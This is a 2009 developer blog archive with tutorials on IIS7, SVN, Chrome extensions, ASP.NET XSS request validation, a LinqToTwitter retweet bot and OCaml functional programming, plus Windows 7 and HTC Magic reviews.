Archive for 2009

Take advantage of the new Windows 7 Taskbar #2 [Showcase : Bloginto7]

This is the part 2 of how to build a simple feed reader following the style of the Gmail Notifier Plus which uses basically the Windows 7 taskbar features.42001378_thumb
Part 1 was about the XAML part of the application, this part will show how to read the feeds asynchronously, how to change the ProgressBar and have an auto update features to read feeds.
First we need a prototype class to hold the feeds :

  1. namespace BlogInto_win7
  2. {
  3.     public class Feed
  4.     {
  5.         public int Id { get; set; }
  6.         public string Title { get; set; }
  7.         public string Link { get; set; }
  8.         public string PubDate { get; set; }
  9.         public string Author { get; set; }
  10.         public string Description { get; set; }
  11.         public string Votes { get; set; }
  12.     }
  13. }
Then we will need the following public variables to hold the feeds data, the current feeds shown and a timer for auto update.

Posted in , , , , , , , , , |

BlogInto, The First Google Chrome Extension For Bloginy

BlogInto has been around for a while as a standard Windows application or a Windows 7 specific version, today it is going public as a Google Chrome extension too.

It is so basic for now and it is the result of less than 2 hours playing around with the extensions’ APIs and specifications, if you want to play around with them too, make sure you take a look at the post about developing Google Chrome extensions I posted yesterday.

You can install it directly from here : and of course the source code is public, you can view it using the Chrome developer tools –this is how to do it : [link]-.

Sans titre

Well,I hope you like it, and I would be happy to hear your feedback about any issues and problems with the extension, also any suggestions about features to include are welcome too.


Develop Google Chrome Extensions, SVN ‘em All Now

The buzz these days is all about Google Chrome extensions, you can check the directory of the available extensions here, you can even publish you own extensions on the same website.
If you want to develop for Google Chrome extensions, you will be so pleased if you already know JavaScript, the extensions are some sort of JavaScript pages (frames) that interact with a variety of APIs.
The Google Extensions website for developers on Google Code - is really amazing (as all the other products explained by Google) and it’s too detailed and simple to follow and start getting your hands on the Chrome extensions.
After a while you will need to try out the examples they provide, and the best way is to checkout their ready-to-run samples using you favorite SVN tool, here I use TortoiseSVN for Windows and it’s working pretty cool.
In your favorite directory, right click in a free space and choose SVN Checkout.

Run you own web server using PHP / ASP.NET on IIS7 [Part #2 – Install Aquia-Drupal and Wordpress on IIS]

After part #1 about how to make your webserver available publically on the internet, I will discuss how to install php on IIS7 and how to run some known web applications on the same server.
There are 2 ways to install php on IIS, the first and the simplest one is to use the Microsoft’s Web Platform installer, you get the latest stable version of php and fastcgi configured, if you don’t know already, the Web Platform offers dozen of tools for developers, from Visual Studio Express, to database servers, IIS, php, webapps and more…
You can download the web Platform Installer from here 

The second method to install php  detailed here is to download php separately, then add a new script mapping and associate the extension you want to the php handler.

At the end, create a test page on the C:\inetpub\wwwroot directory –test.php for example- and copy this function inside, you have to add the current user to the owners of the directory in order to change or create files in it.

<?php  phpinfo();  ?>

Install WPA certificates (*.cer files) on Android

Installing custom certificates on Android was a real headache and a difficult issue for a lot of people, as for me, I was not able to connect to my university wifi because they are using a custom WPA certificate, you can see details about this here and other related problems with certificates and exchange server here.
The solution that I come over accidently was a small program on the Android Market called wifi helper, it supports :

    1. open wifi
    2. WEP
    3. WPA Personal
    4. WPA2 Personal
    5. WPA Enterprise
    6. WPA2 Enterprise
    7. LEAP
It’s pretty easy to use, and have a lot of advanced features also, I will show here how to use it with an open wifi that requires custom certificate file.
Trying to access the login page for the university wifi website gives the following :
device1 device2

Even selecting continue won’t make your device to connect to this network, so the solution is to download the certificate separately from your computer then upload it to you phone then configure Wifi helper like the following :
Choose Add new configuration –> standard mode then type the network name, in connection mode choose infrastructure, then in the wifi security choose the best that fits your situation, here I use WPA Enterprise, in my case the network wifi is open so I fill what ever in the Identity and Password, then comes the most important part where you choose the certificate file that you downloaded in the SDCARD.
device device3
device4 device5
Now with this set up, you can reconnect to the network and everything will work pretty well not just with the browser but all the apps that access this network.

Using SVN With Visual Studio 2010

SVN is a must have for managing projects and keeping them proper, with a history of changes, what should be done when 2 versions of the same file are changed and so on. It’s so important even for a developer working alone, since code will be never lost.

This post is a quick work through on how to install and use SVN on Windows and Visual Studio, you can read more about SVN here.

First, you should know that having a subversion client on Windows is sufficient, you can do all the stuff in there without the need to have it integrated with Visual Studio, but if you are like me, want perfect handling from within VS then you can go further to integrate it there as well.

We will use TortoiseSVN, a free Subversion client for Windows which integrates a cool shell menu to handle the different SVN commands, install it from here. Once installed you will notice a new shell menus.


After that, you have to create a repository (for guys who work on their machines). It is quite simple, you create an empty folder, this folder will be the location where all the history of the projects is saved, so make sure it somewhere safe.

Within this folder, right click and choose TortoiseSVN -> create repository here. Once created, you will notice the following contents added to the folder :


Now, you have to choose the repository structure, with whatever structure you want (see the recommendations for that here), right click the content of the directory and choose TortoiseSVN –> import.

With a repository created and with a structure ready, you can start playing with projects from Windows explorer, for example create a Directory and inside it create a text file, then choose SVN checkout, this will add the content to the repository


You will notice a little green bullet within the icon of the folder, which means the local content is updated compared to the content of the repository, let’s try something else, create a new text file inside that folder, then right click it and choose TortoiseSVN –> add to repository, this will make a little “+” sign with its icon, which means it’s ready to be committed. At this stage you will notice that the parent folder has changed to a red icon, which means it’s not up to date with the repository anymore.

4 5 7

Right clicking this file, choose SVN commit will bring this screen, where you can add messages to keep history of changes.

That’s generally how it works from within windows explorer, after the commit of this file, a new green icon will be back again to the parent folder, of course you can commit the parent folder and all the content will be committed, you can compare differences between local content  and the repository content and so on..
You will find all the commands within the shell menu, and they appear only on folders that you added to the repository, hitting shift + right click will bring more commands

Pretty cool, so what about Visual Studio?
Actually you can do the same from the Visual Studio 2010 (or other versions), from the document explorer precisely, there is a free plug-in called AnkhSVN found here

Once installed, it will bring Subversion functionality to Visual Studio, you can verify it’s installed well, and also configure some aspects from Tools –> Options –> Source Control


Create a new project, you will notice a little checkbox asking if you want add this project to Subversion or not, then you will get a parameters window where you can configure: the repository to use, the local folder and so on, I’m using a repository through http here, you don’t have to use only local repositories.

9 image

Everything is setup now, on the solution explorer you will notice the “+” signs on the contents, which means they are waiting for a commit to the repository, AnkhSVN bring the same functionality to the project explorer that TortoiseSVN brings to the shell menu (tip: AnkhSVN uses TortoiseSVN repositories, they are not the same), so you will notice the same, red, green icons as well, right clicking a file and choosing SVN –> commit will commit the file to the repository.


You can compare files before updating or committing by choosing Subversion –> Compare


There are dozens of other functionalities also, you can read more about TortoiseSVN and SVN in general from their website

Posted in , , |

Windows 7, XP Mode, Compatibility Issues, and MS Haters Feelings

I’ve been using windows 7 since the first day the beta version was out publically, after that I moved to the RC version and now I am using the RTM version. To be honest I am completely admiring it, despite some bugs I’ve noticed on the beta version here and here, and a problem caused by my graphics card here, I still admire it..
Two (2) days ago, I got a genuine 64 bits Windows 7 Professional copy, I installed it yesterday and every thing, including drivers, worked automatically with a little update of the graphics drivers. Despite the fact that it is a 64 bit version, all the programs (most of them are 32 bit) are working normally. Now Windows 7 is my main system after all this period of testing (I erased Vista completely from the HDD).
Note : If you are a student Windows 7 Professional is available for free to the MSDN AA subscribers, if your university / college do not offer MSDN AA account for it’s students you can get Win7 for $30 [link]
This post was aimed to talk about the XP mode, but first I want to mention some reactions from some guys out there claiming that Windows 7 “sucks”, or it is just “a Vista with improved graphics”.
First, someone mentioned that after using Windows 7 for 5 minutes (or 2 hours) he switched back directly to *Linux*, well, no comment, I only say : “take a deep breath, and forget your hurt feelings towards Microsoft for a while, then try Windows 7 again, just admit they are doing great software these days”.
Someone else said : all the programs he run were not compatible with windows 7, I am completely astonished by this, for almost 10 months now, from the beta to the RTM version, I never encountered a software incompatibility on Win7 yet ( the 32 bits or the 64 bits), so in this case, there are two possibilities :

  1. You are running a program from 1703 : if so… ask yourself : do you seriously want to keep running that thing? wouldn’t you consider upgrading it or such? If the answer is no, keep reading, the XP mode might save you.
  2. You never heard about the “Compatibility Mode” introduced years ago, within Win 7 or Vista you can choose which environment the program works (or supposed to work) normally, here is a sample screenshot about that, just right click your program to see this:  1As you see, you can even specify Windows 95, or even the service pack in case of Win XP, 2003 and Vista. Of course Windows 7 is far smarter than this, if it detects that the program is too recent it propose also Windows 2008 and do not allow versions older than XP.
If after all this, your program still doesn’t work (which is not likely to happen) then running XP virtualized programs is your end line solution.

Windows XP mode :

Windows XP mode allows you to run programs within an XP virtualized environment directly from you Windows 7 desktop, I will show my experience installing it and how to quickly make it runs on your computer, although I think I will never need someday.
Windows Virtual PC provides the capability to run multiple Windows environments such as Windows XP Mode from your Windows 7 desktop.
In order to install the Windows XP mode on your computer (which mean get a valid free copy of windows XP virtualized on your pc :) ) you need to have a CPU that supports virtualization, most of recent hardware support that!
Windows Virtual PC requires a CPU with the Intel® Virtualization Technology or AMD-V™ feature turned on. This feature must be enabled in the system BIOS. For details on how to enable, visit the Configure BIOS page or check with your computer manufacturer.
I have an AMD Turion 64x2 CPU, and I used this tool called AMD-V Hyper-V Compatibility Check Utility to test that the CPU is compatible, for Intel CPUs you can use the Intel Processor Identification Utility for this.
Running this utility will show if the CPU you are using support the XP mode or not, and whether the hardware virtualization is enabled in your BIOS or not. For me the CPU is compatible, but virtualization was disabled, so I enabled it in the BIOS as shown bellow :
2009-10-16 03.11.58 Once this is done, you run the utility again, and that is what I got :
Now you go here and download the Virtual PC and the Windows XP mode, be sure to choose the best system type, 32 bits or 64 bits.
After installing it, you should get Windows Virtual PC menu like this in the start menu :
3 Starting the Windows X mode, will bring some wizards to configure the virtualized XP machine, also notice that your HDD will be shared between Windows 7 and the virtualized Windows XP, so that you can easily install programs from there.
Now let’s suppose Notepad++ didn’t work on Windows 7, what we have to do is install it inside Windows XP like follows :
5If you turn back to windows 7 start menu now, you can find the newly installed program on windows XP there, you can pin it to the task bar or create a shortcut to the desktop and run it like any other program under windows 7, the window borders will show that it is running on the XP mode:
6And here is the result :
As you can see, it is running pretty well like any other program on 7 except that it is on a windows XP, and because it has access to the whole filesystem, you will not notice any difference. Another time, you might never need this someday, this might be handy for companies who *do not* want to upgrade IE 6 for example.
So if after all this, some guys still say “we tried it for 5 mins and no program worked in it” then just know they might have serious psychological problems with the word “Microsoft”.

Posted in , , , |

Prevent JavaScript Injections Using the ASP.NET Built in XSS Filters

XSS is the web vulnerability number 1 according to the OWASP project. If you developed web applications before, you know that its prevention exceeds escaping characters and using some regular expressions to filter out user input.

A good video here, show in 40 minutes XSS and why it’s more dangerous than what most of us think, check it out to understand what XSS is, although it explains only the XSS in the browser and not injected JavaScript like in PDF files or vulnerabilities in QuickTime and other software.

The best way to prevent XSS is to take advantage of the platform you are developing upon. Symphony has a built in functionalities to prevent XSS and CSRF. Today I will show a sneak preview of how the ASP.NET framework protect you from XSS attacks, this functionality has been around years before.

By default trying to inject a script in an ASP.NET form will trigger the exception System.Web.HttpRequestValidationException, as follows :

1 Although this protect you from XSS attacks but it shows your users an ugly exception and even some information that might be sensitive, for example the path of the page that caused the error and such, to solve this issue there are several solutions that I will show 2 among them.

1. Redirect to the default error page using the Web.config file:

As you maybe know already, you can redirect users to a default error page using only declarative syntax in the web.config file, and this includes also exceptions thrown when XSS attacks are encountered.

In the web.config file, insert this code in the <system.web> section:

<customErrors mode ="On" >
error statusCode="500" redirect="error_page_handling_500_status.aspx" />

For more detailed information about custom errors handling on ASP.NET you can refer here, for example you might want show errors only when connecting to the website remotely etc… You can provide as much error pages as you want mapping the appropriate HTTP error status, in this case we handle the 500 HTTP error code.

2. Override the on errors method and handle manually the response :

This method is more flexible and powerful, since it allows you to handle each exception separately, the only caveat is that you have to send the response HTML to the user yourself, because once an exception is raised, the ASP.NET execution pipeline breaks down. here is a sample of how to do this, in your page inert this code:

protected override void OnError(EventArgs e)
if (Server.GetLastError().GetBaseException() is
Response.Write("<h1> Your input has some unauthorized "
+ "markup, please provide a valid data </h1>");
Response.StatusCode = 200;


Here you can notice that we check if the exception was raised by the detected XSS input, then we clear the response buffer and put some feed back to the user, of course you can send a full HTML page at this stage, and definitely you have to change the HTTP error status to 200 to indicate to the browser (or a JavaScript code using XHR) that the request was executed successfully. 

3 Also notice the commented line, you can simply redirect the user to anther page, but this is not encouraged because users will have no clue about what happened.

Even normal HTML markup is detected as malicious code what to do?

Despite the flexible protection that the ASP.NET XSS filters provides, some times you need to accept such input from your users (<b> or <i> tags…), and hence, you need to tell ASP.NET not to check for XSS anymore. This is not an advised step and in 90% of the cases you will never need to do this.

To specify a page that doesn’t need XSS protection, you add this attribute to the page


2 From now on, you have to validate yourself the user input, or even the output of data which is coming from outside sources like web services or a database. One step to never forget is escaping data when rendering it back to the user. This line do it nicely :


Escaping data might sound as an ultimate solution to all the XSS problems, but it is not, most of the cases, programmers do not sanitize completely the data that they write to a database, and when displaying the same data, they consider it trusted, since it resides on their database, and this is when persistent XSS take place. So as an advice: never turn off the XSS validation unless you are 100% sure about what you are doing.

An example of this vulnerability can be found on the BlogEngine open source project (tested here, despite the fact that a brilliant team was working behind it, but… never trust user input.


user data is malicious unless proven otherwise.

Build your own retweet / hash bot with #LinqToTwitter

You love twitter? You love Linq too? Then you are gonna adore LinqToTwitter.

LINQ to Twitter is a LINQ Provider for the Twitter micro-blogging service. It uses standard LINQ syntax
for queries and includes method calls for changes via theTwitter API.

LinqToTwitter is one of the most inspiring applications out there made with C# by @JoeMayo. You can download it from here : It is open source and several projects are using it already.

Today I want to show how simple it is to develop your own twitter based application using LinqToTwitter, as for an example we will build a simple retweet / hash bot, like the ones we find on twitter for example hashandroid, hashphp, hashcss and more.

You can use for example such bots to retweet every tweet mentioning your domain name, your own name, your trademark or even your favorite movie. A valuable tool for business too.

Download LinqToTwitter, then start a new Visual Studio solution, we will use C# as the language.

First we need to add a reference to the LinqToTwitter DLL and System.Configuration (Solution Explorer –> References –> Add a Reference).

The code is so simple actually, I will explain as long as we go through the code, you can find the complete source code in the attached file from here.

To be sure our bot won’t retweet tweets that are already processed we will read the ID of the tweet from the configuration file like follows

// Start fetching tweets from the last one we fetched before, to not retweet duplicate tweets
// We do this by searching for tweeting having an ID >= to lastTweetID

saved in the App.config
var lastTweetID = getLastTweetID();

private static string getLastTweetID()
return ConfigurationManager.AppSettings["lastTweetID"];

Once the last tweet ID retrieved, we fetch all the tweets that have a specified string and are emitted after our lastTweetID:

List<AtomEntry> lstTweets = SearchTwitter(twitterCtx, "martani_net"
, Convert.ToUInt64(lastTweetID));

The function SearchTwitter returns the list of tweets satisfying the criteria,we pass the term to search for and the last tweetID.

private static List<AtomEntry> SearchTwitter(TwitterContext twitterCtx, string searchWrd, ulong lastTweetID)
var queryResults =
from search in twitterCtx.Search
where search.Type == SearchType.Search &&
search.Query == searchWrd &&
search.PageSize == 10 &&
search.SinceID == lastTweetID
select search;

foreach (var search in queryResults)
return search.Entries.ToList();
return null;

Now that we have the list of tweets we save the most recent tweet ID so that the next time we fetch only new tweets:

var lastTweet = lstTweets.First();
lastTweetID = lastTweet.ID.Substring(lastTweet.ID.LastIndexOf(':') + 1);

// Save the lastest tweet ID in the App.config file.

This is the function that saves the lastTweetID in the app.config file (actually this didn’t work for me!! any help?)

private static void saveLastTweetID(string lastTweetID)
System.Configuration.Configuration config =

config.AppSettings.Settings["lastTweetID"].Value = lastTweetID;

Everything is ready now, we have just to retweet the new tweets with a little change in their form :

foreach (var entry in lstTweets)
string via = " (via @" + GetShortName(entry.Author.Name) + ")";
string contentWithoutHTML = DeleteHTML(entry.Content);
string newTweet = contentWithoutHTML.Substring(0,
Math.Min(contentWithoutHTML.Length, 140 - via.Length))
+ via;

// skip tweets that we already retweeted before
if (AlreadyTwittered(contentWithoutHTML))


Here we are fetching the user name and storing it in the via variable. we use the GetShortName function to get only the user name and not it’s real name. For example entry.Author.Name returns “martani_net (Martani Fakhrou)” so our function returns only “martani_net

private static string GetShortName(string longName)
return longName.Substring(0, longName.IndexOf(' '));

Then we get the content of the tweet without any HTML, we use a simple regular expression to delete any html specific tags:

private static string DeleteHTML(string text)
Regex reg = new Regex("<[^>]*>");
return reg.Replace(text, "");

Then we compose the new tweet which is the content without HTML + the “via (username)” footer. Here we have to be aware that our tweet doesn’t exceed 140 chars which mean the true length of the content can’t exceed 140 – the length of the footer (via @something)

Still one trick to take care of, our retweeted tweets will be fetched also, which means we have to take them away, for this we use the function AlreadyTwittered as follows :

private static bool AlreadyTwittered(string p)
// if the tweet ends with ")" and have the string " (via" then
// we might have retweeted it already
// this is a poor cretaria, just for examples here.

if (p.EndsWith(")") && p.IndexOf(" (via") != -1)
return true;
return false

Well this is all, we can now send our new tweet to twitter with the following statement


Of course you have to handle also how this program will execute periodically, each 10 minutes for example.

If you intend to use AOuth then you have to setup your application on twitter to get the secret and API key, otherwise you can use the old authentication system, and yeah LinqToTwitter handle all this for you :).


the source code from here.

I have a lot of tricks to do with LinqToTwitter, and from those, a bot available publically to make users able to set their hashtags or specific words to build their own bot with just few clicks, but I can’t make it to sell an ASP.NET hosting and make my projects real :), any help will be appreciated of course.

Twinq test :


Posted in , , , |

Run you own web server using PHP / ASP.NET on IIS7 [Part #1]

These tutorials aims basically to target PHP and beginner ASP.NET developers to show them how to configure, run and make their IIS7 web server serving websites on Internet from their home machines. It's also intended to fill the gap between PHP developers and the non open source products out there, especially the IIS server which a lot of them are not aware of. Also ASP.NET developers will benefit from these tutorials too, because configuring the server affect any web platform running on that server.

Part #1 will be a quick view of how to make IIS7 run your website locally and how to access it from internet. Most of the time, when developing web application, we encounter a lot of problems like timeout requests, malformed HTTP headers and of course execution time and such that we can't test once we develop on a local server. So configuring our machine to be a webhost will be the first step that we will take.

Also, you can use your own web server for testing purposes, developers usually send a copy of their web applications to friends to test it, which is just a bad choice in all sorts of considerations, the best is to access one version of your website running on your own machine like a real website with a special domain name.

IIS7? The "what" and the "why"

IIS stands for Internet Information Service and it's Microsoft’s web server running on windows platforms. IIS7 is the latest version and the most secure, fast, reliable and robust; it ships with Windows Vista, Windows 7 and Windows 2008 Server by default with some limitations according to your windows edition.

I can just say: it is more than great; you want to find out more about it here : or

Installing and running IIS7

IIS7 is installed by default on Windows 2008 and some Windows 7 / Vista versions, check the Administrative tools in the control panel to see if there is the IIS manager or not, In case it's not installed, just few clicks will bring it up, follow the tips here :

To run IIS7 : Start > Control Panel > Administrate Tools > IIS Manager, notice that you must have administrative privileges to do so.


This is the IIS manager, where you can configure all the aspects of the server, if you used IIS6 or 5 before, you will find this a little different from the old ones. As you can see there are dozens of settings from Modules, to CGI and port bindings to a lot of other stuff that we will walk through in the next part.


To make sure everything was configured correctly, go to or http://localhost/ on your browser.


Making IIS7 available on the web

The easiest way to do so is to find your IP address, use for example, and navigate to /">http://<you-ip>/. Chances that you won't get access to your server are very high, first because you may be using a router which blocks entering requests, or your firewall is blocking every request coming from internet.

Configuring your router

The next step is to configure your router to translate the port 80 (http) to your web server in order to handle it, just head to your router configuration page, look for the port translation option and map the port 80 (TCP) to your machines LOCAL IP address with the port 80 also (we will talk about port binding on IIS in the next parts).


That's it, nothing more, now typing your own IP address will give you the IIS7 welcome homepage.

Giving your server a domain name

You may prefer accessing your server with a domain name rather than using your IP address (which is a problem as we will see in the following section). You can use your own domain name to make it point to your IP address, or you can use a free, fast, lightweight service aimed for such testing and not persistent cases.

I used for this, they have a good DNS redirection services and it's for free, just create an account, choose your sub domain and point it to you IP, for example "" like in the following picture :


Now you can access you web server using that domain name which is better than typing the IP address.

Dynamic IP, The domain name is not pointing to your server anymore!

If your provider assigns a different IP each time to your router then the above method will just break because the domain name will always point to the old IP address. There are a lot of solutions for this, but the best one is to use DynDNS if your router supports this by default.

DynDNS is almost the same thing as the previous service except that it points to the IP the router indicates and updates each time it changes. Once you create your account on DynDNS (Also free, don't worry), enter these details on your router DynDNS configuration section, and you are done:



Debugging, security and everything else

I am sure that since you are a web developer, you are aware of security and privacy risks, like tracing your IP to know your location, or hacking, brute forcing your server. But if you are aware enough nothing of that will happen, and since this is just a startup server to test with some of your friends, an application like this wouldn’t be a problem after all.

At the end I would like to mention how debugging under the .NET framework and IIS works to give more security options to developers. If you have an error in your website for example, running it locally with show you more details about the error and the configuration of the server, but requesting the web application from outside will just give a simple message indicating the HTTP status of the error like in the following pictures. This is a very useful feature in web development security.



The next tutorial will be about: how to configure IIS7 and run PHP on top of it.

[Bonus] This is how did I test my IIS from a Windows XP machine connecting to a public wifi, pretty nice isn't it :)

2009-09-21 23.38.52

Understand functional programming with F# and OCAML: part #3 of n

this is the 3rd part of our tutorials which aim to make people more familiar with functional programming and the functional thinking in general, if you are new to functional programming, be sure you take a look at the first two parts here :

Today I’ll explain the most important point about functional programming, which is obviously functions. as you can guess it’s called functional programming because functions are first class citizens here, they are so special and powerful, we will take a look at how to define functions, understand their types, some pattern matching tricks and a little examples to make you think functionally and get out of the imperative box.

How to define a function in OCAML (as I always say, it’s also F# compatible):

this is the general syntax for defining functions

let [function_name] [param_1] [param_2] … [param_n] =

[the function code goes here] ;;

As you ca see, you provide the function name after the let keyword, the same allowed variable name rules in other languages apply here, for example you can’t have a function named “4342” or “ZER zer” that’s obvious.

then comes the input values or the parameter names, parameters are delimited by spaces (not commas like in the other languages), as I explained the reason of this in the second part of this series.

let’s see that example :

let fun1 x y = do_things_here;;

let fun2 (x, y) = do-other-things-here ;;

those two functions are totally different, fun1 accept two generic parameters x and y (ah, you wonder what are generics?? don’t worry we will talk about that), and fun2 accept one parameters which is the tuple (x, y). Part 2 is so important since understanding functional programming is about understanding types!

there are also other ways to define functions:

  1. the fun keyword : this type of declaration is used when working with iterators to define functions on the fly (like anonymous functions for the .NET framework or lambdas)

    let [function_name] = fun [param_1] … [param_n] –>

    [function boddy here];;

    this is an example of a function that returns the sum of two values :

    let add = fun x y –> x + y;;

    the first type of syntax is just a shortcut for this one, we can define it as follows

    let add x y = x + y;;

  2. the Function keyword : this is the same as the above case, I didn’t encounter a case where I can use Function and not fun. So the same rules applied for fun are also valid for Function.
  3. with partial definition : this is quite an advanced topic that we will talk about in the future parts, but for now keep in mind that you can obtain functions as a return type of other functions or expression:

For example, taking the List.for_all iterator we can define a function that tests is a list have just positive values like follows

let is_all_positive = List.for_all (fun x –> if x >= 0 then true else false);;

or :

let predicate x = if x >= 0 then true else false;;

let is_all_positive = List.for_all predicate;;

well that is, now we can pass a list and the function will return a bool indicating if all the elements are positive or not, for example :

is_all_positive [3,56,23,0];; (* returns true*)

well, if you are new to functional programming, you may have not noticed anything at all going here, if your head is starting to think functionally then it should be blocking now, and if you are an advanced functional programmer then you might be having a big smile now for the beauty of what you are looking to :)

the first question is, how the is_all_positive function knows about it will be having a list as a parameter? simple, the inference engine knows everything :), you will see why once we discuss generics.

second : we don’t see anywhere in the code that we told is_all_positive that it will take a parameter at all, how is that possible? this is a little advanced topic, called partial application, but this is how it works in general : if we don’t mention the last parameter when we apply a function partially, it returns a function which will have that parameter for example :

let add x y = x + y;;

let add_x_to_10 = add 10;;

it might seems a little complicated for now, but once you get used to functions types, you will see more clearer.

Function types, the secret behind understanding functional programming

This is the most important part to understand function programming, function types. Let’s start with the simplest function that take one parameter and return a simple data type (yes a function can return a function too :D )

let fun1 x = x + 1;;

this is the simplest function ever, it takes one parameter which is an int (an int not float, not string, see part 2 for that, “+” applies only to int, in F# that’s another story, let’s keep OCAML for now), and simply returns an int which represents the successor of x.

To express the type of that function, we use an advanced (weird for imperative people) representation, if you type this in OCAML you get the following type :

# let fun1 x = x + 1;;
val fun1 : int -> int = <fun>

the type is what’s behind “val fun”, as you see functions are values like everything else, they can be returned in any expression in your code.

more specifically the type is int –> int which means the function take an int and returns an int, not that complicated after all !

now let’s see a function with 2 parameters :

# let fun2 var1 var2 = var1 + var2;;
val fun2 : int -> int -> int = <fun>

now if you see the type it is int –> int –> int, so is translates to the function take an int and an int and returns an int? not really, this is an imperative thinking! in fact putting parentheses will clarify things a little bit:

this type int –> int –> int could be read like follows int –> (int –> int), in function type, parentheses are right associated! so for now we can read it as follows : the fun2 takes an int and returns a (int –> int) which is like in the first example a function which in it’s turn take an int and returns an int.

In other words, fun2 takes an int and returns a function of type (int –> int)

this is how the compiler see the function :

let fun2 var1 = (fun var2 –> var1 + var1);;

be sure you understand what is happening here? if you can’t see all the picture then you can’t go anymore in your way understanding functional programming, here is a simple concrete example :

# let add x y = x + y;;
val add : int -> int -> int = <fun>

now :

# add 4 7;;
- : int = 11
# add (-2) 4;;
- : int = 2

notice that when passing negative values you have to embrace them with parentheses, let’s consider now passing one argument to this function, that sound not valid in the imperative style but it’s the key of success in functional programming:

# add 6;;
- : int -> int = <fun>

so what just happened? passing one argument to the add function doesn’t cause an error but returns another function which has the type (int –> int), you can define another function from this one like follows :

# let add_to_6 x = add x 6;;
val add_to_6 : int -> int = <fun>

or simply as we stated before :

# let add_to_6 = add 6;;
val add_to_6 : int -> int = <fun>

here we just defined a function that adds 6 to any other number, using the function that add two numbers.

you might not realize the use of that now, but be sure that will save you someday :)

Types, types and type:

as I stated before (in the previous parts), every expression in the OCAML code has a type, and by every I mean ALL of them, for example consider this piece of imperative code :

int a = 23;
int s = “a cool string”;
bool b = true;
if (b = true)
a = 123;
s = “b is not true”;

that’s a totally valid code in C# or other languages, if you are used to this type of code (chances are your 99% are used to), you will have to change a little of the way you deal with your code, in fact in OCAML even the if statement must return (must have in other words) a type, and a unique type.

means that the type of the if part must be the same as the type in the else part, for example

let x = if 1 = 1 then
"this is impossible";;

in this piece of code, we wanted x to be the int 3 if 1 is equal to 1, otherwise take the value of the string “this is impossible”.

this is what we get after typing this in OCAML:

Characters 39-59:
"this is impossible";;
Error: This expression has type string but is here used with type int

as you see, the compiler is stating that we used a string in a place where it expects an int, why that? because the if block must return one type, whether the condition is valid or not, as you see in that case that it will never reach the else, but the OCAML compiler is so strict, that will bother you a little but you will love it once you get your hands coding.

did I mention that you can return functions from if blocks?? yes, you can, let see this :

# let give_me_a_function b =
if b then
fun x -> x + 10
fun x -> x * 10;;
val give_me_a_function : bool -> int -> int = <fun>

as you see here, we have a function “give_me_a_function” that takes a boolean and returns a function according to the value of that boolean, if true, a function that adds 10 to it’s parameter, of multiply it by 10 otherwise.

so let’s apply some of what we learned so far, we can define a partially function from this one like follows :

# let add_to_10 = give_me_a_function true;;
val add_to_10 : int -> int = <fun>
# add_to_10 13;;
- : int = 23
# let by_10 = give_me_a_function false;;
val by_10 : int -> int = <fun>
# by_10 23;;
- : int = 230

cool isn’t it? a function that returns functions? not just that but an if…then…else block that returns two different functions.But… that doesn’t mean t return any function it wants, remember that is has to return one and only one type, so all the functions that can be returned must have the same type (signature in other words).

we can apply the “give_me_a_function” directly like this

# (give_me_a_function false) 27;;
- : int = 270

we can apply directly the if statement returning a function to parameters :

# (if true then fun x -> x + 4 else fun x -> x - 4) 27;;
- : int = 31

Recursive functions :

recursive functions are a key feature in functional programming, you may use recursive functions so frequently in your code, like you use for loops in the imperative world.

to define a recursive function you add the rec keyword before the function name like in the following example :

# let rec fact n =
if n = 0 then
n * fact ( n - 1);;
val fact : int -> int = <fun>

this is a simple example of a recursive function that calculates the factorial of a positive number, if you don’t provide the rec keyword in a recursive function you will get an error.

this was a sneak peak on recursive functions which are so important, we will discuss them with details in the next tutorial along with, pattern matching, tail recursion and we will dig more vast and real functions using more daily used examples.

Did you understand function types?

try to figure out the types of the following function and if they are valid or not (most of them has not a valid type), the answers are in the end of the post. Be sure you understand the Part 2 and this part before you try to solve those little questions, if you solve 40% of these then consider yourself eligible to pass to the next part, otherwise you may need to read it again.

# let add x y z = x + y / z;;

# let add2 x y z = x + y /. z;;

# let add3 x y = add1 x y;;

# let f1 = fun x -> x^"sssssss";;

# let f2 = fun x -> fun y -> x@y;;

# let f3 x = fun y -> x::y;;

# let f4 =
if true then
fun x y -> x + y
fun x y -> x +. y;;
let f5 x y z =
if y then
z +. 2.;;
let f5 m =
if fst m then
if snd m then
(fst m) && (snd m)
not (fst m)
m + 7;;

Answers will be posted soon.

First hands on HTC Magic

The new Google phone called Android G2 or HTC Magic launched earlier on July 2009 is one of the most great phones ever, that are supposed (the Android family) to be an iPhone, BlackBerry and Palm killer.

If you are a Google fan, then a Google phone is all what you need , it's running the Google Android platform and everything from Google could be found inside.


Two days ago I got an HTC magic and it's just wonderful, it's design, the touch screen and keyboard, it's support for Google apps natively, and many more features.

Compared to an iPhone it's a little smaller and lighter, it's touch abilities are great but no fluid like the iPhone's, if the touch functionalities on the iPhone are 10/10, HTC magic can get 9/10 easily :)

Also Android supported phones has full access to the Android Market where you can download and purchase new application, it's equivalent to the Apple Store, and you can find almost any application you need. If you don't find your application you can develop yours easily, and yes, you don't need a Mac to develop for Android; Windows, Linux and Mac are all supported to run the Android SDK.

Another point that makes the HTC Magic better than an iPhone (at least my view point) is that it's multi task, means you can run simultaneous applications at the same time, which is not available on the iPhone even with the new OS 3.0. For example, I use it while opening Google Talk chatting with friends, and I get twitter notifications from the #twidroid application, emails from Gmail while listening to music or even taking a tour in Google Street View, and all this happens simultaneously :)

On the other side, you can connect to internet using data connection (3G, Edge, Gprs) or use Wifi, for me I use Wifi all the time since my Subscription does not include full internet access (18€ / month for 1H + 15€ internet if I had full internet), so if you are like my case, I advise you to download this application called #apndroid which changes the APN settings on your phone to ban it from connecting to (3G, Edge, gprs), you may also download 3G watchdog that will help you track you data usage (mine is 0% for the time :D ). Even if you are not browsing the internet many applications still try to connect in the background so be careful if you don't have an internet subscription. It costs 0.34€ / minute which means if you run a twitter application for 24 hours you will pay 8.16€ for just one day! more that 150€ a month yay!!!

Before digging into the technical details, just to mention that the price of the phone bought online (from SFR, and no no, I don't advertise for anyone, it's just a great phone) is 149€ with a subscription of 18€/month during 12 months, 349€ "forfait bloqué" and 449€ for others. so seriously getting it for 149€ with a very careful moderated usage not going online except with Wifi is the best deal I did before.

The HTC Magic has an integrated 3.2 megapixels camera with Camcoder for videos, it has Gmail, Gtalk, Google Maps with street View, YouTube; Android Market, gps, compass and a lot of other features, of course you can get Google Sky, social web application, news, weather and everything else you can imagine from the Android Market. it's integrated touch keyboard is very sensitive and responsive too, sharing photos or videos has never been easier before with Picasa, YouTube, email, twitter or many many other services.

